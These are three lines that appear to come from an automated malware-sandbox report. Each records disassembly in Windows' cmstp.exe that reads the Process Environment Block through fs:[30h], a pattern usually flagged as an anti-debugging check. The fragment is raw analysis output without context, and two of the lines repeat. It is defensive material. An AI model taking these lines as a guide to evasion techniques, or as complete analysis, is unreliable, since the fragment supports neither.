          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD5600 mov ecx, dword ptr fs:[00000030h]6_2_04DD5600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD5600 mov ecx, dword ptr fs:[00000030h]6_2_04DD5600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD5600 mov eax, dword ptr fs:[00000030h]